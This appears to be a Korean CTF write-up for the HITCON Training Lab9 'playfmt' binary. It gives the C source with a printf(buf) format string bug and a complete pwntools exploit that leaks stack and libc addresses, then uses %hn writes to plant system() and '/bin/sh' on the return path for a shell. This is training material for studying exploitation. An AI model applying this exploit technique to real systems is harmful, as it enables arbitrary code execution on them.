[HITCON TRAINING] LAB9

[HITCON TRAINING] LAB9 → WRITE UP

해당 바이너리의 보호기법을 확인해본다.

해당 바이너리의 보호기법으로는 NX bit가 적용되어 있다.

해당 바이너리의 소스코드를 확인해보자.

#include <stdio.h> #include <unistd.h> #include <string.h> char buf[200] ; void do_fmt(){ while(1){ read(0,buf,200); if(!strncmp(buf,"quit",4)) break; printf(buf); } return ; } void play(){ puts("====================="); puts(" Magic echo Server"); puts("====================="); do_fmt(); return; } int main(){ setvbuf(stdout,0,2,0); play(); return; }

해당 소스코드를 분석해본 결과 Line12에서 포맷 스트링 버그가 발생하는 것을 확인할 수 있다.

하지만 해당 버퍼공간이 전역변수로 선언되어 있기 때문에 포맷스트링 버그를 통해 입력버퍼 공간에는 접근하는 것은 불가능하다는 문제가 존재한다.

먼저 포맷스트링을 통해 해당 공간의 데이터를 출력해보자.

다음과 같이 스택공간이 출력되는 것을 확인할 수 있다.

직접적으로 우리가 원하는 공간에 접근하여 값을 쓰기 위해서는 

일반적인 포맷 스트링에서는 버퍼공간에 접근할 수 있어서 해당 공간에 접근하고자 하는 공간의 주소를 입력한후 해당 버퍼를 통해서

%s으로 해당 값을 출력하거나, %n으로 데이터를 조작할 수 있었다.

하지만 해당 바이너리에서는 직접적으로 버퍼 공간에 메모리를 입력하여 접근할 수는 없으나 노란색 공간 내부에서 가르치는 공간은 초록색 공간이다.

결과적으로 포맷 스트링으로 접근할 수 있는 공간에 값을 변조할 수 있다는 것이다.

뿐만 아니라

 

빨간색 공간이 의미하는 것은 do_fmt 함수가 종료되었을 경우 Return할 주소인 Return Address이다.

이를 기반으로

다음과 같이 스택공간을 구성가능할 것으로 예상된다.

익스플로잇을 작성하면

from pwn import * p = process('./playfmt') e = ELF('./playfmt') libc = e.libc printf_got = e.got['printf'] system_offset = libc.symbols['system'] libc_start_main_offset = libc.symbols['__libc_start_main'] binsh_offset = 0x120c6b script = """ b * 0x08048548 c """ #gdb.attach(p, script) for i in range(3): p.recvline() payload = '' payload += '%6$p.' payload += '%15$p.' payload += '#' p.sendline(payload) esp = int(p.recvuntil('.')[:-1], 16) - 40 libc_start_main_247 = int(p.recvuntil('.')[:-1], 16) libc_base = libc_start_main_247 - libc_start_main_offset - 247 system = libc_base + system_offset #esp = 0xffffcd70 #system = 0xf7e3bda0 system_low = (system) & 0xffff system_high = (system >> 16) & 0xffff binsh_addr = system + 0x120c6b binsh_low = (binsh_addr) & 0xffff binsh_high = (binsh_addr >> 16) &0xffff print("system_addr : " + str(hex(system))) print("system_addr : " + str(hex(system_high))) print("system_addr : " + str(hex(system_low))) print("binsh_addr : " + str(hex(binsh_addr))) # Step1. Insert system() addr payload = "" payload += "%{}x".format((esp+28) & 0xffff) payload += "%6$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) payload = "" payload += "%{}x".format(system_low) payload += "%10$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) payload = "" payload += "%{}x".format((esp+30) & 0xffff) payload += "%6$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) payload = "" payload += "%{}x".format(system_high) payload += "%10$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) # Step2. Insert binsh addr payload = "" payload += "%{}x".format((esp+36) & 0xffff) payload += "%6$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) payload = "" payload += "%{}x".format(binsh_low) payload += "%10$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) payload = "" payload += "%{}x".format((esp+38) & 0xffff) payload += "%6$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) payload = "" payload += "%{}x".format(binsh_high) payload += "%10$hn" payload += "#" print(payload) sleep(1) p.sendlineafter("#", payload) sleep(1) print("SEND 'quit'") p.sendlineafter("#", "quit") p.interactive()